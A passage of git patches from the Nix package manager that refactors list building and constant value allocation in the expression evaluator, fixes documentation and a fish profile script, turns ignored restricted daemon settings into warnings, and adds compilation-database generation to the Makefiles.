+    for (const auto & [n, i] : enumerate(elems)) {
         /* Create a pseudo-derivation containing the name, system,
            output paths, and optionally the derivation path, as well
            as the meta attributes. */
@@ -72,10 +70,9 @@ bool createUserEnv(EvalState & state, PackageInfos & elems,
             attrs.alloc(state.sDrvPath).mkString(state.store->printStorePath(*drvPath));
 
         // Copy each output meant for installation.
-        auto & vOutputs = attrs.alloc(state.sOutputs);
-        state.mkList(vOutputs, outputs.size());
+        auto outputsList = state.buildList(outputs.size());
         for (const auto & [m, j] : enumerate(outputs)) {
-            (vOutputs.listElems()[m] = state.allocValue())->mkString(j.first);
+            (outputsList[m] = state.allocValue())->mkString(j.first);
             auto outputAttrs = state.buildBindings(2);
             outputAttrs.alloc(state.sOutPath).mkString(state.store->printStorePath(*j.second));
             attrs.alloc(j.first).mkAttrs(outputAttrs);
@@ -87,6 +84,7 @@ bool createUserEnv(EvalState & state, PackageInfos & elems,
 
             references.insert(*j.second);
         }
+        attrs.alloc(state.sOutputs).mkList(outputsList);
 
         // Copy the meta attributes.
         auto meta = state.buildBindings(metaNames.size());
@@ -98,11 +96,14 @@ bool createUserEnv(EvalState & state, PackageInfos & elems,
 
         attrs.alloc(state.sMeta).mkAttrs(meta);
 
-        (manifest.listElems()[n++] = state.allocValue())->mkAttrs(attrs);
+        (list[n] = state.allocValue())->mkAttrs(attrs);
 
         if (drvPath) references.insert(*drvPath);
     }
 
+    Value manifest;
+    manifest.mkList(list);
+
     /* Also write a copy of the list of user environment elements to
        the store; we need it for future modifications of the
        environment. */
diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc
index d2d699a64..43b545035 100644
--- a/tests/unit/libexpr/value/print.cc
+++ b/tests/unit/libexpr/value/print.cc
@@ -79,11 +79,11 @@ TEST_F(ValuePrintingTests, tList)
     Value vTwo;
     vTwo.mkInt(2);
 
+    auto list = state.buildList(3);
+    list.elems[0] = &vOne;
+    list.elems[1] = &vTwo;
     Value vList;
-    state.mkList(vList, 5);
-    vList.bigList.elems[0] = &vOne;
-    vList.bigList.elems[1] = &vTwo;
-    vList.bigList.size = 3;
+    vList.mkList(list);
 
     test(vList, "[ 1 2 «nullptr» ]");
 }
@@ -249,12 +249,12 @@ TEST_F(ValuePrintingTests, depthList)
     Value vNested;
     vNested.mkAttrs(builder2.finish());
 
+    auto list = state.buildList(3);
+    list.elems[0] = &vOne;
+    list.elems[1] = &vTwo;
+    list.elems[2] = &vNested;
     Value vList;
-    state.mkList(vList, 5);
-    vList.bigList.elems[0] = &vOne;
-    vList.bigList.elems[1] = &vTwo;
-    vList.bigList.elems[2] = &vNested;
-    vList.bigList.size = 3;
+    vList.mkList(list);
 
     test(vList, "[ 1 2 { ... } ]", PrintOptions { .maxDepth = 1 });
     test(vList, "[ 1 2 { nested = { ... }; one = 1; two = 2; } ]", PrintOptions { .maxDepth = 2 });
@@ -539,11 +539,11 @@ TEST_F(ValuePrintingTests, ansiColorsList)
     Value vTwo;
     vTwo.mkInt(2);
 
+    auto list = state.buildList(3);
+    list.elems[0] = &vOne;
+    list.elems[1] = &vTwo;
     Value vList;
-    state.mkList(vList, 5);
-    vList.bigList.elems[0] = &vOne;
-    vList.bigList.elems[1] = &vTwo;
-    vList.bigList.size = 3;
+    vList.mkList(list);
 
     test(vList,
          "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_CYAN "2" ANSI_NORMAL " " ANSI_MAGENTA "«nullptr»" ANSI_NORMAL " ]",
@@ -670,11 +670,11 @@ TEST_F(ValuePrintingTests, ansiColorsListRepeated)
     Value vEmpty;
     vEmpty.mkAttrs(emptyBuilder.finish());
 
+    auto list = state.buildList(2);
+    list.elems[0] = &vEmpty;
+    list.elems[1] = &vEmpty;
     Value vList;
-    state.mkList(vList, 3);
-    vList.bigList.elems[0] = &vEmpty;
-    vList.bigList.elems[1] = &vEmpty;
-    vList.bigList.size = 2;
+    vList.mkList(list);
 
     test(vList,
          "[ { } " ANSI_MAGENTA "«repeated»" ANSI_NORMAL " ]",
@@ -690,11 +690,11 @@ TEST_F(ValuePrintingTests, listRepeated)
     Value vEmpty;
     vEmpty.mkAttrs(emptyBuilder.finish());
 
+    auto list = state.buildList(2);
+    list.elems[0] = &vEmpty;
+    list.elems[1] = &vEmpty;
     Value vList;
-    state.mkList(vList, 3);
-    vList.bigList.elems[0] = &vEmpty;
-    vList.bigList.elems[1] = &vEmpty;
-    vList.bigList.size = 2;
+    vList.mkList(list);
 
     test(vList, "[ { } «repeated» ]", PrintOptions { });
     test(vList,
@@ -750,11 +750,12 @@ TEST_F(ValuePrintingTests, ansiColorsListElided)
     Value vTwo;
     vTwo.mkInt(2);
 
+    {
+    auto list = state.buildList(2);
+    list.elems[0] = &vOne;
+    list.elems[1] = &vTwo;
     Value vList;
-    state.mkList(vList, 4);
-    vList.bigList.elems[0] = &vOne;
-    vList.bigList.elems[1] = &vTwo;
-    vList.bigList.size = 2;
+    vList.mkList(list);
 
     test(vList,
          "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«1 item elided»" ANSI_NORMAL " ]",
@@ -762,12 +763,18 @@ TEST_F(ValuePrintingTests, ansiColorsListElided)
              .ansiColors = true,
              .maxListItems = 1
          });
+    }
 
     Value vThree;
     vThree.mkInt(3);
 
-    vList.bigList.elems[2] = &vThree;
-    vList.bigList.size = 3;
+    {
+    auto list = state.buildList(3);
+    list.elems[0] = &vOne;
+    list.elems[1] = &vTwo;
+    list.elems[2] = &vThree;
+    Value vList;
+    vList.mkList(list);
 
     test(vList,
          "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«2 items elided»" ANSI_NORMAL " ]",
@@ -775,6 +782,7 @@ TEST_F(ValuePrintingTests, ansiColorsListElided)
              .ansiColors = true,
              .maxListItems = 1
          });
+    }
 }
 
 } // namespace nix

From 3e6730ee62b10acff12e7dd66e1269d7a9da7a21 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Fri, 15 Mar 2024 18:22:39 +0100
Subject: [PATCH 628/654] Mark Value pointers in Value::elems as const

This catches modification of finalized values (e.g. in prim_sort).
---
 src/libexpr/eval.cc    | 2 +-
 src/libexpr/eval.hh    | 2 +-
 src/libexpr/primops.cc | 5 +++--
 src/libexpr/value.hh   | 4 ++--
 4 files changed, 7 insertions(+), 6 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 297832818..fb4cfdccf 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -1946,7 +1946,7 @@ void ExprOpConcatLists::eval(EvalState & state, Env & env, Value & v)
 }
 
 
-void EvalState::concatLists(Value & v, size_t nrLists, Value * * lists, const PosIdx pos, std::string_view errorCtx)
+void EvalState::concatLists(Value & v, size_t nrLists, Value * const * lists, const PosIdx pos, std::string_view errorCtx)
 {
     nrListConcats++;
 
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 4a271f4ef..7db911fce 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -671,7 +671,7 @@ public:
         const SingleDerivedPath & p,
         Value & v);
 
-    void concatLists(Value & v, size_t nrLists, Value * * lists, const PosIdx pos, std::string_view errorCtx);
+    void concatLists(Value & v, size_t nrLists, Value * const * lists, const PosIdx pos, std::string_view errorCtx);
 
     /**
      * Print statistics, if enabled.
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 32913d72e..9449a8f7c 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -3372,7 +3372,6 @@ static void prim_sort(EvalState & state, const PosIdx pos, Value * * args, Value
     auto list = state.buildList(len);
     for (const auto & [n, v] : enumerate(list))
         state.forceValue(*(v = args[1]->listElems()[n]), pos);
-    v.mkList(list);
 
     auto comparator = [&](Value * a, Value * b) {
         /* Optimization: if the comparator is lessThan, bypass
@@ -3391,7 +3390,9 @@ static void prim_sort(EvalState & state, const PosIdx pos, Value * * args, Value
     /* FIXME: std::sort can segfault if the comparator is not a strict
        weak ordering. What to do? std::stable_sort() seems more
        resilient, but no guarantees... */
-    std::stable_sort(v.listElems(), v.listElems() + len, comparator);
+    std::stable_sort(list.begin(), list.end(), comparator);
+
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_sort({
diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh
index 9f0600efb..885621cf5 100644
--- a/src/libexpr/value.hh
+++ b/src/libexpr/value.hh
@@ -246,7 +246,7 @@ public:
         Bindings * attrs;
         struct {
             size_t size;
-            Value * * elems;
+            Value * const * elems;
         } bigList;
         Value * smallList[2];
         ClosureThunk thunk;
@@ -425,7 +425,7 @@ public:
         return internalType == tList1 || internalType == tList2 || internalType == tListN;
     }
 
-    Value * * listElems()
+    Value * const * listElems()
     {
         return internalType == tList1 || internalType == tList2 ? smallList : bigList.elems;
     }

From 39b0b8452f79e710b65b363663491fc17bb04a25 Mon Sep 17 00:00:00 2001
From: Yueh-Shun Li 
Date: Sun, 17 Mar 2024 06:13:14 +0800
Subject: [PATCH 629/654] doc: builtins.addDrvOutputDependencies: fix link
 target

---
 src/libexpr/primops/context.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libexpr/primops/context.cc b/src/libexpr/primops/context.cc
index 88502fe2d..f5444b44a 100644
--- a/src/libexpr/primops/context.cc
+++ b/src/libexpr/primops/context.cc
@@ -144,7 +144,7 @@ static RegisterPrimOp primop_addDrvOutputDependencies({
       The original string context element must not be empty or have multiple elements, and it must not have any other type of element other than a constant or derivation deep element.
       The latter is supported so this function is idempotent.
 
-      This is the opposite of [`builtins.unsafeDiscardOutputDependency`](#builtins-addDrvOutputDependencies).
+      This is the opposite of [`builtins.unsafeDiscardOutputDependency`](#builtins-unsafeDiscardOutputDependency).
     )",
     .fun = prim_addDrvOutputDependencies
 });

From d2b512959c00e487c4858a6c4bd53dc9db0bf0d6 Mon Sep 17 00:00:00 2001
From: Yueh-Shun Li 
Date: Mon, 18 Mar 2024 02:38:31 +0800
Subject: [PATCH 630/654] builtins.addDrvOutputDependencies: fix commentary

---
 src/libexpr/primops/context.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libexpr/primops/context.cc b/src/libexpr/primops/context.cc
index f5444b44a..27a454b27 100644
--- a/src/libexpr/primops/context.cc
+++ b/src/libexpr/primops/context.cc
@@ -246,7 +246,7 @@ static RegisterPrimOp primop_getContext({
 
 /* Append the given context to a given string.
 
-   See the commentary above unsafeGetContext for details of the
+   See the commentary above getContext for details of the
    context representation.
 */
 static void prim_appendContext(EvalState & state, const PosIdx pos, Value * * args, Value & v)

From ad217ddbbc759f1b67bf1368032f364ee483b790 Mon Sep 17 00:00:00 2001
From: lelgenio 
Date: Mon, 18 Mar 2024 16:23:17 -0300
Subject: [PATCH 631/654] Document builtins.storePath being disabled by
 pure-eval

---
 src/libexpr/eval-settings.hh | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh
index c5581b9ff..60d3a6f25 100644
--- a/src/libexpr/eval-settings.hh
+++ b/src/libexpr/eval-settings.hh
@@ -76,9 +76,10 @@ struct EvalSettings : Config
 
           - Restrict file system and network access to files specified by cryptographic hash
           - Disable impure constants:
-            - [`bultins.currentSystem`](@docroot@/language/builtin-constants.md#builtins-currentSystem)
+            - [`builtins.currentSystem`](@docroot@/language/builtin-constants.md#builtins-currentSystem)
             - [`builtins.currentTime`](@docroot@/language/builtin-constants.md#builtins-currentTime)
             - [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath)
+            - [`builtins.storePath`](@docroot@/language/builtin-constants.md#builtins-storePath)
         )"
         };
 

From a5262fb880826d278477b77a595b571559476030 Mon Sep 17 00:00:00 2001
From: Jonathan Ringer 
Date: Tue, 19 Mar 2024 17:37:04 -0700
Subject: [PATCH 632/654] Document how to build many outputs of a flake package

---
 src/nix/build.md | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/src/nix/build.md b/src/nix/build.md
index 0fbb39cc3..4c6f6049f 100644
--- a/src/nix/build.md
+++ b/src/nix/build.md
@@ -40,6 +40,18 @@ R""(
   lrwxrwxrwx 1 … ./result-dev -> /nix/store/dkm3gwl0xrx0wrw6zi5x3px3lpgjhlw4-glibc-2.32-dev
   ```
 
+* Build all outputs:
+
+  ```console
+  # nix build nixpkgs#openssl^* --print-out-paths
+  /nix/store/gvad6v0cmq1qccmc4wphsazqbj0xzjsl-openssl-3.0.13-bin
+  /nix/store/a07jqdrc8afnk8r6f3lnhh4gvab7chk4-openssl-3.0.13-debug
+  /nix/store/yg75achq89wgqn2fi3gglgsd77kjpi03-openssl-3.0.13-dev
+  /nix/store/bvdcihi8c88fw31cg6gzzmpnwglpn1jv-openssl-3.0.13-doc
+  /nix/store/gjqcvq47cmxazxga0cirspm3jywkmvfv-openssl-3.0.13-man
+  /nix/store/7nmrrad8skxr47f9hfl3xc0pfqmwq51b-openssl-3.0.13
+  ```
+
 * Build attribute `build.x86_64-linux` from (non-flake) Nix expression
   `release.nix`:
 

From c448636f7c8b50d3d41085bb72e5f608ac1344c1 Mon Sep 17 00:00:00 2001
From: Jesse Schalken 
Date: Wed, 20 Mar 2024 15:23:31 +1100
Subject: [PATCH 633/654] Fix loop over $NIX_PROFILES in
 nix-profile-daemon.fish.in

---
 scripts/nix-profile-daemon.fish.in | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/scripts/nix-profile-daemon.fish.in b/scripts/nix-profile-daemon.fish.in
index c23aa64f0..346dce5dd 100644
--- a/scripts/nix-profile-daemon.fish.in
+++ b/scripts/nix-profile-daemon.fish.in
@@ -28,7 +28,7 @@ else
 end
 
 # Set $NIX_SSL_CERT_FILE so that Nixpkgs applications like curl work.
-if test -n "$NIX_SSH_CERT_FILE"
+if test -n "$NIX_SSL_CERT_FILE"
   : # Allow users to override the NIX_SSL_CERT_FILE
 else if test -e /etc/ssl/certs/ca-certificates.crt # NixOS, Ubuntu, Debian, Gentoo, Arch
   set --export NIX_SSL_CERT_FILE /etc/ssl/certs/ca-certificates.crt
@@ -44,7 +44,7 @@ else if test -e "$NIX_LINK/etc/ca-bundle.crt" # old cacert in Nix profile
   set --export NIX_SSL_CERT_FILE "$NIX_LINK/etc/ca-bundle.crt"
 else
   # Fall back to what is in the nix profiles, favouring whatever is defined last.
-  for i in $NIX_PROFILES
+  for i in (string split ' ' $NIX_PROFILES)
     if test -e "$i/etc/ssl/certs/ca-bundle.crt"
       set --export NIX_SSL_CERT_FILE "$i/etc/ssl/certs/ca-bundle.crt"
     end

From 40a7929c8e221e6096c3edd2dd0af948a29e3141 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?F=C3=A9lix=20Baylac-Jacqu=C3=A9?= 
Date: Sat, 8 Jun 2019 00:41:19 +0200
Subject: [PATCH 634/654] Daemon: warn when an untrusted user cannot override a
 setting

In a daemon-based Nix setup, some options cannot be overridden by a
client unless the client's user is considered trusted.

Currently, if an untrusted user tries to override one of those
options, we are silently ignoring it.

This can be pretty confusing in certain situations.

e.g. a user thinks he disabled the sandbox when in reality he did not.

We are now sending a warning message letting the user know that some
options have been ignored.

Related to #1761.

This is a cherry-pick of 9e0f5f803f6cbfe9925cef69a0e58cbf5375bfaf.
The above commit has been reverted by
a59e77d9e54e8e7bf0f3c3f40c22cd34b7a81225 to prevent spamming warnings
with experimental features, but these are now totally ignored on the
daemon side, so there's no reason for the revert any more.
---
 src/libstore/daemon.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc
index 917813342..2c808015d 100644
--- a/src/libstore/daemon.cc
+++ b/src/libstore/daemon.cc
@@ -254,7 +254,7 @@ struct ClientSettings
                 else if (setSubstituters(settings.substituters))
                     ;
                 else
-                    debug("ignoring the client-specified setting '%s', because it is a restricted setting and you are not a trusted user", name);
+                    warn("ignoring the client-specified setting '%s', because it is a restricted setting and you are not a trusted user", name);
             } catch (UsageError & e) {
                 warn(e.what());
             }

From 0b08dd45b03afd5161966893e42080bf130f527c Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 20 Mar 2024 21:28:38 +0100
Subject: [PATCH 635/654] prim_match: Use state.vNull

---
 src/libexpr/primops.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 9449a8f7c..2cb78e35f 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -4004,7 +4004,7 @@ void prim_match(EvalState & state, const PosIdx pos, Value * * args, Value & v)
         auto list = state.buildList(match.size() - 1);
         for (const auto & [i, v2] : enumerate(list))
             if (!match[i + 1].matched)
-                (v2 = state.allocValue())->mkNull();
+                v2 = &state.vNull;
             else
                 (v2 = state.allocValue())->mkString(match[i + 1].str());
         v.mkList(list);

From d4b0b7f15280659424acc1109679bda7dae11e92 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 20 Mar 2024 21:34:23 +0100
Subject: [PATCH 636/654] createBaseEnv: Use state.vNull

---
 src/libexpr/primops.cc | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 2cb78e35f..61a11b226 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -4430,8 +4430,7 @@ void EvalState::createBaseEnv()
         )",
     });
 
-    v.mkNull();
-    addConstant("null", v, {
+    addConstant("null", &vNull, {
         .type = nNull,
         .doc = R"(
           Primitive value.

From 4c8a33ce468ae7b369368e6a26a3180030262f23 Mon Sep 17 00:00:00 2001
From: Jonathan Ringer 
Date: Wed, 20 Mar 2024 14:42:44 -0700
Subject: [PATCH 637/654] Update src/nix/build.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Théophane Hufschmitt <7226587+thufschmitt@users.noreply.github.com>
---
 src/nix/build.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/nix/build.md b/src/nix/build.md
index 4c6f6049f..5dfdd44a7 100644
--- a/src/nix/build.md
+++ b/src/nix/build.md
@@ -43,7 +43,7 @@ R""(
 * Build all outputs:
 
   ```console
-  # nix build nixpkgs#openssl^* --print-out-paths
+  # nix build "nixpkgs#openssl^*" --print-out-paths
   /nix/store/gvad6v0cmq1qccmc4wphsazqbj0xzjsl-openssl-3.0.13-bin
   /nix/store/a07jqdrc8afnk8r6f3lnhh4gvab7chk4-openssl-3.0.13-debug
   /nix/store/yg75achq89wgqn2fi3gglgsd77kjpi03-openssl-3.0.13-dev

From d71e74838aade579f9e5e2771ba26b7077398e93 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 20 Mar 2024 22:56:42 +0100
Subject: [PATCH 638/654] readDir: Allocate type strings only once

---
 src/libexpr/eval.cc    |  4 ++++
 src/libexpr/eval.hh    |  9 +++++++++
 src/libexpr/primops.cc | 21 +++++++++------------
 3 files changed, 22 insertions(+), 12 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index fb4cfdccf..a6e8a4a8b 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -437,6 +437,10 @@ EvalState::EvalState(
 
     vEmptyList.mkList(buildList(0));
     vNull.mkNull();
+    vStringRegular.mkString("regular");
+    vStringDirectory.mkString("directory");
+    vStringSymlink.mkString("symlink");
+    vStringUnknown.mkString("unknown");
 
     /* Initialise the Nix expression search path. */
     if (!evalSettings.pureEval) {
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 7db911fce..a405888c1 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -191,6 +191,15 @@ public:
      */
     Value vNull;
 
+    /** `"regular"` */
+    Value vStringRegular;
+    /** `"directory"` */
+    Value vStringDirectory;
+    /** `"symlink"` */
+    Value vStringSymlink;
+    /** `"unknown"` */
+    Value vStringUnknown;
+
     /**
      * The accessor for the root filesystem.
      */
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 61a11b226..2022f6dcf 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -1775,20 +1775,20 @@ static RegisterPrimOp primop_hashFile({
     .fun = prim_hashFile,
 });
 
-static std::string_view fileTypeToString(InputAccessor::Type type)
+static Value * fileTypeToString(EvalState & state, InputAccessor::Type type)
 {
     return
-        type == InputAccessor::Type::tRegular ? "regular" :
-        type == InputAccessor::Type::tDirectory ? "directory" :
-        type == InputAccessor::Type::tSymlink ? "symlink" :
-        "unknown";
+        type == InputAccessor::Type::tRegular ? &state.vStringRegular :
+        type == InputAccessor::Type::tDirectory ? &state.vStringDirectory :
+        type == InputAccessor::Type::tSymlink ? &state.vStringSymlink :
+        &state.vStringUnknown;
 }
 
 static void prim_readFileType(EvalState & state, const PosIdx pos, Value * * args, Value & v)
 {
     auto path = realisePath(state, pos, *args[0], std::nullopt);
     /* Retrieve the directory entry type and stringize it. */
-    v.mkString(fileTypeToString(path.lstat().type));
+    v = *fileTypeToString(state, path.lstat().type);
 }
 
 static RegisterPrimOp primop_readFileType({
@@ -1819,8 +1819,8 @@ static void prim_readDir(EvalState & state, const PosIdx pos, Value * * args, Va
     Value * readFileType = nullptr;
 
     for (auto & [name, type] : entries) {
-        auto & attr = attrs.alloc(name);
         if (!type) {
+            auto & attr = attrs.alloc(name);
             // Some filesystems or operating systems may not be able to return
             // detailed node info quickly in this case we produce a thunk to
             // query the file type lazily.
@@ -1832,7 +1832,7 @@ static void prim_readDir(EvalState & state, const PosIdx pos, Value * * args, Va
         } else {
             // This branch of the conditional is much more likely.
             // Here we just stringize the directory entry type.
-            attr.mkString(fileTypeToString(*type));
+            attrs.insert(state.symbols.create(name), fileTypeToString(state, *type));
         }
     }
 
@@ -2193,11 +2193,8 @@ bool EvalState::callPathFilter(
     Value arg1;
     arg1.mkString(pathArg);
 
-    Value arg2;
     // assert that type is not "unknown"
-    arg2.mkString(fileTypeToString(st.type));
-
-    Value * args []{&arg1, &arg2};
+    Value * args []{&arg1, fileTypeToString(*this, st.type)};
     Value res;
     callFunction(*filterFun, 2, args, res, pos);
 

From a865049c4f39cb7773f97a67cfa12f5b650a86ee Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 20 Mar 2024 23:06:23 +0100
Subject: [PATCH 639/654] tryEval: Allocate true and false once

---
 src/libexpr/eval.cc    |  2 ++
 src/libexpr/eval.hh    | 18 +++++++++++++++++-
 src/libexpr/primops.cc |  7 ++++---
 3 files changed, 23 insertions(+), 4 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index a6e8a4a8b..a62cee299 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -437,6 +437,8 @@ EvalState::EvalState(
 
     vEmptyList.mkList(buildList(0));
     vNull.mkNull();
+    vTrue.mkBool(true);
+    vFalse.mkBool(false);
     vStringRegular.mkString("regular");
     vStringDirectory.mkString("directory");
     vStringSymlink.mkString("symlink");
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index a405888c1..eac83fe34 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -187,10 +187,26 @@ public:
     Value vEmptyList;
 
     /**
-     * Null constant.
+     * `null` constant.
+     *
+     * This is _not_ a singleton. Pointer equality is _not_ sufficient.
      */
     Value vNull;
 
+    /**
+     * `true` constant.
+     *
+     * This is _not_ a singleton. Pointer equality is _not_ sufficient.
+     */
+    Value vTrue;
+
+    /**
+     * `false` constant.
+     *
+     * This is _not_ a singleton. Pointer equality is _not_ sufficient.
+     */
+    Value vFalse;
+
     /** `"regular"` */
     Value vStringRegular;
     /** `"directory"` */
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 2022f6dcf..0f2aaa83f 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -896,10 +896,11 @@ static void prim_tryEval(EvalState & state, const PosIdx pos, Value * * args, Va
     try {
         state.forceValue(*args[0], pos);
         attrs.insert(state.sValue, args[0]);
-        attrs.alloc("success").mkBool(true);
+        attrs.insert(state.symbols.create("success"), &state.vTrue);
     } catch (AssertionError & e) {
-        attrs.alloc(state.sValue).mkBool(false);
-        attrs.alloc("success").mkBool(false);
+        // `value = false;` is unfortunate but removing it is a breaking change.
+        attrs.insert(state.sValue, &state.vFalse);
+        attrs.insert(state.symbols.create("success"), &state.vFalse);
     }
 
     // restore the debugRepl pointer if we saved it earlier.

From 8c6e0df45f9091fc27143f24d4fe782c661393e2 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 20 Mar 2024 23:07:00 +0100
Subject: [PATCH 640/654] value.hh: Fix warning about {struct/class} Value

---
 src/libexpr/value.hh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh
index 885621cf5..335801b34 100644
--- a/src/libexpr/value.hh
+++ b/src/libexpr/value.hh
@@ -159,7 +159,7 @@ public:
     iterator begin() { return &elems[0]; }
     iterator end() { return &elems[size]; }
 
-    friend class Value;
+    friend struct Value;
 };
 
 

From 1fcdd1640ec2e63f14487c1af60514fb62ffef19 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 20 Mar 2024 23:11:54 +0100
Subject: [PATCH 641/654] functionArgs: Allocate bools only once

---
 src/libexpr/eval.cc    | 3 +++
 src/libexpr/eval.hh    | 5 +++++
 src/libexpr/primops.cc | 3 +--
 3 files changed, 9 insertions(+), 2 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index a62cee299..5e2f71649 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -937,6 +937,9 @@ ListBuilder::ListBuilder(EvalState & state, size_t size)
     state.nrListElems += size;
 }
 
+Value * EvalState::getBool(bool b) {
+    return b ? &vTrue : &vFalse;
+}
 
 unsigned long nrThunks = 0;
 
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index eac83fe34..f15d19653 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -650,6 +650,11 @@ public:
         return ListBuilder(*this, size);
     }
 
+    /**
+     * Return a boolean `Value *` without allocating.
+     */
+    Value *getBool(bool b);
+
     void mkThunk_(Value & v, Expr * expr);
     void mkPos(Value & v, PosIdx pos);
 
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 0f2aaa83f..d0fcfd194 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -2845,8 +2845,7 @@ static void prim_functionArgs(EvalState & state, const PosIdx pos, Value * * arg
 
     auto attrs = state.buildBindings(args[0]->lambda.fun->formals->formals.size());
     for (auto & i : args[0]->lambda.fun->formals->formals)
-        // !!! should optimise booleans (allocate only once)
-        attrs.alloc(i.name, i.pos).mkBool(i.def);
+        attrs.insert(i.name, state.getBool(i.def), i.pos);
     v.mkAttrs(attrs);
 }
 

From 83fc988bec374d6beb197e6dde9aef20b6f52b8d Mon Sep 17 00:00:00 2001
From: Andrea Bedini 
Date: Mon, 18 Mar 2024 23:57:15 +0800
Subject: [PATCH 642/654] Create compile-commands.json with Make

---
 .gitignore                 |  1 +
 mk/compilation-database.mk | 11 +++++++++++
 mk/lib.mk                  |  8 ++++++++
 mk/patterns.mk             | 36 +++++++++++++++++++++++++++++++++---
 mk/tracing.mk              |  2 ++
 5 files changed, 55 insertions(+), 3 deletions(-)
 create mode 100644 mk/compilation-database.mk

diff --git a/.gitignore b/.gitignore
index 7bf77adf4..01fafa5a9 100644
--- a/.gitignore
+++ b/.gitignore
@@ -142,6 +142,7 @@ GTAGS
 
 # auto-generated compilation database
 compile_commands.json
+*.compile_commands.json
 
 nix-rust/target
 
diff --git a/mk/compilation-database.mk b/mk/compilation-database.mk
new file mode 100644
index 000000000..f69dc0de0
--- /dev/null
+++ b/mk/compilation-database.mk
@@ -0,0 +1,11 @@
+compile-commands-json-files :=
+
+define write-compile-commands
+  _srcs := $$(sort $$(foreach src, $$($(1)_SOURCES), $$(src)))
+
+  $(1)_COMPILE_COMMANDS_JSON := $$(addprefix $(buildprefix), $$(addsuffix .compile_commands.json, $$(basename $$(_srcs))))
+
+  compile-commands-json-files += $$($(1)_COMPILE_COMMANDS_JSON)
+
+  clean-files += $$($(1)_COMPILE_COMMANDS_JSON)
+endef
diff --git a/mk/lib.mk b/mk/lib.mk
index fe0add1c9..a002d823f 100644
--- a/mk/lib.mk
+++ b/mk/lib.mk
@@ -68,6 +68,7 @@ include mk/patterns.mk
 include mk/templates.mk
 include mk/cxx-big-literal.mk
 include mk/tests.mk
+include mk/compilation-database.mk
 
 
 # Include all sub-Makefiles.
@@ -97,6 +98,13 @@ $(foreach test-group, $(install-tests-groups), \
     $(eval $(call run-test,$(test),$(install_test_init))) \
     $(eval $(test-group).test-group: $(test).test)))
 
+# Compilation database.
+$(foreach lib, $(libraries), $(eval $(call write-compile-commands,$(lib))))
+$(foreach prog, $(programs), $(eval $(call write-compile-commands,$(prog))))
+
+compile_commands.json: $(compile-commands-json-files)
+	@jq --slurp '.' $^ >$@
+
 # Include makefiles requiring built programs.
 $(foreach mf, $(makefiles-late), $(eval $(call include-sub-makefile,$(mf))))
 
diff --git a/mk/patterns.mk b/mk/patterns.mk
index c81150260..4caa2039e 100644
--- a/mk/patterns.mk
+++ b/mk/patterns.mk
